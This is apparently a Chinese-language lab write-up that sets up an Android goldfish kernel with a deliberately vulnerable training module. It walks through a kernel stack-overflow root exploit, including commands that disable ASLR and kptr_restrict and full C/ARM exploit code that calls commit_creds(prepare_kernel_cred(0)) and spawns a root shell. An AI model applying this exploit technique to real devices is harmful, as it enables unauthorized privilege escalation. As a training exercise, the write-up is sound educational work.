android kernel | 环境搭建 + 第一次尝试

搭建环境过于艰辛,做个记录....

• 参考链接:
  • 安全客 链接
  • github 内核测试项目地址

环境搭建

• 内核代码下载
  • git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git
• 漏洞项目代码下载
  • git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges
• 内核编译 和 准备工作:
  • 准备 | 将 漏洞模块 编译进内核

    cd goldfish && git checkout -t origin/android-goldfish-3.4 &&
    git am --signoff < ../kernel_exploit_challenges/kernel_build/debug_symbols_and_challenges.patch &&
    cd .. && ln -s $(pwd)/kernel_exploit_challenges/ goldfish/drivers/vulnerabilities

  • 准备编译工具
    • 下载 arm-linux-androideabi-4.6.tar.bz2
    • tar xvf arm-linux-androideabi-4.6.tar.bz2
    • export PATH=PATH | 推荐将指令加入 〜/ .bashrc 一劳永逸
  • 编译指令(在 goldfish 目录下)
    • make goldfish_armv7_defconfig && make -j8
• 安卓环境准备
  • 安卓sdk
  • 解压 : tar xvf android-sdk_r24.4.1-linux.tgz
  • 加入环境变量 : export PATH=/home/haclh/hacktools/android-sdk-linux/tools:$PATH
  • 下载jdk
    • 新开一个 shell , 运行 android (需要在加入环境变量步骤后使用)

    • 下载下图中指定的jdk

      
      
      image.png

    • 下载后通过 android list targets 指令可以查看所有下载的 镜像文件

      
      
      image.png
  • 创建模拟器
    • android create avd --force -t "android-19" -n kernel_challenges
• 使用内核运行模拟器
  • emulator -show-kernel -kernel arch/arm/boot/zImage -avd kernel_challenges -no-boot-anim -no-skin -no-audio -no-window -qemu -monitor unix:/tmp/qemuSocket,server,nowait -s
• android 动态调试 (goldfish 目录下运行如下指令)
  • arm-linux-androideabi-gdb vmlinux

---

第一次尝试 | 内核栈溢出提权

• 首先看看漏洞代码， kernel_exploit_challenges / challenge / stack_buffer_overflow / module / stack_buffer_overflow.c ：

#include 
#include 
#include 
#include 
#include 
#include 
#define MAX_LENGTH 64
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Ryan Welton");
MODULE_DESCRIPTION("Stack Buffer Overflow Example");
static struct proc_dir_entry *stack_buffer_proc_entry;
int proc_entry_write(struct file *file, const char __user *ubuf, unsigned long count, void *data)
{
    char buf[MAX_LENGTH];
    if (copy_from_user(&buf, ubuf, count)) {
        printk(KERN_INFO "stackBufferProcEntry: error copying data from userspacen");
        return -EFAULT;
    }
    return count;
}
static int __init stack_buffer_proc_init(void)
{
    stack_buffer_proc_entry = create_proc_entry("stack_buffer_overflow", 0666, NULL);
    stack_buffer_proc_entry->write_proc = proc_entry_write;
    printk(KERN_INFO "created /proc/stack_buffer_overflown");
    return 0;
}
static void __exit stack_buffer_proc_exit(void)
{
    if (stack_buffer_proc_entry) {
        remove_proc_entry("stack_buffer_overflow", stack_buffer_proc_entry);
    }
    printk(KERN_INFO "vuln_stack_proc_entry removedn");
}
module_init(stack_buffer_proc_init);
module_exit(stack_buffer_proc_exit);

• 相关知识点

  • 提权基础
    • 用户态 | 内核态 区别 (EL1 | EL0 权限等级)
    • 提权思路 : 利用 EL1 权限下可以执行的 EL0 级别的操作中的漏洞 , 在EL0 级别的操作过程中做到命令执行 , 提升用户等级 , 并反弹shell , 从而做到普通用户到 root 的提权 | 描述方式需要修改。。。
  • 驱动编程 | 在这次利用过程中必要的知识
    • 注册驱动 | module_init , open 时调用
    • stack_buffer_proc_entry->write_proc | 当对这个设备写入时 , 会调用 write_proc 对应的函数
    • copy_from_user（＆buf，ubuf，count） 从用户空间拷贝数据到buf
  • 回到用户态:
    • 下面就是要回到用户态，在x86平台有iret指令可以回到用户态，在arm下返回用户态就更简单了。在arm下cpsr寄存器的M [4： 0]位用来表示处理器的运行模式，具体可以看这个。所以我们把cpsr寄存器的M [4：0]位设置为10000后就表示处理器进入了用户模式。

• 漏洞点 :

  • proc_entry_write 没有对输入长度或字符内容做限制,造成栈溢出

• 这次可能遇到的相关缓解措施 及其缓解手段

  • ASLR
    • 堆栈地址随机化 , 意味着shellcode地址需要动态调整
    • 关闭方式 : echo 0 > proc/sys/kernel/randomize_va_space
  • kptr_restrict
    • 内核层 的 pie | 动态加载 内核符号
    • /proc/kallsyms文件中保存着所有的内核符号的名称和它在内存中的位置
    • 关闭方式 : echo 0 > proc/sys/kernel/kptr_restrict
    • 相关作用 : 获取 commit_creds 和 prepare_kernel_cred 符号的地址,用来提权时使用

• 具体的利用思路:
  - 1.调用 commit_creds（prepare_kernel_cred（0）） 提升权限
  - 2.调用 mov r3，＃0x40000010; MSR CPSR_c，R3; 设置 cpsr 寄存器， 使cpu进入用户模式
  - 3.然后执行 execl（“/ system / bin / sh”，“sh”，NULL）; 起一个 root 权限的 shell

• EXP:

#include 
#include 
#include 
#include 
#include 
#define MAX             68
int open_file(void)
{
        int fd = open("/proc/stack_buffer_overflow", O_RDWR);
        if (fd == -1)
                err(1, "open");
        return fd;
}
void payload(void)
{
                printf("[+] enjoy the shelln");
                execl("/system/bin/sh", "sh", NULL);
}
extern uint32_t shellCode[];
asm
(
"    .text\n"
"    .align 2\n"
"    .code 32\n"
"    .globl shellCode\n\t"
"shellCode:\n\t"
// commit_creds(prepare_kernel_cred(0));
// -> get root
"LDR     R3, =0xc0039d34\n\t"   //prepare_kernel_cred addr
"MOV     R0, #0\n\t"
"BLX     R3\n\t"
"LDR     R3, =0xc0039834\n\t"   //commit_creds addr
"BLX     R3\n\t"
"mov r3, #0x40000010\n\t"
"MSR    CPSR_c,R3\n\t"
"LDR     R3, =0x826d\n\t"     // payload function addr
"BLX     R3\n\t"
);
void trigger_vuln(int fd)
{
        #define MAX_PAYLOAD (MAX + 4)
        char buf[MAX_PAYLOAD];
        memset(buf, 'A', sizeof(buf));

        void * pc = buf + MAX;
        *(void **)pc  = (void *) shellCode;   //ret addr
        /* Kaboom! */

        write(fd, buf, MAX_PAYLOAD );
}

int main(void)
{
        int fd;
        printf("shellcdoe addr: %p\n", shellCode);
        printf("payload:%p\n", payload);
        fd = open_file();
        trigger_vuln(fd);
        close(fd);
}

• tip ：在本地测试会遇到的坑点
  • 1. 本次测试的漏洞时 栈溢出 , 可能在本地环境偏移不同
  • 2. payload 加载地址变化
  • 3. Illegal instruction | 非法指令 , 此报错执行exp 未进入内核态的操作.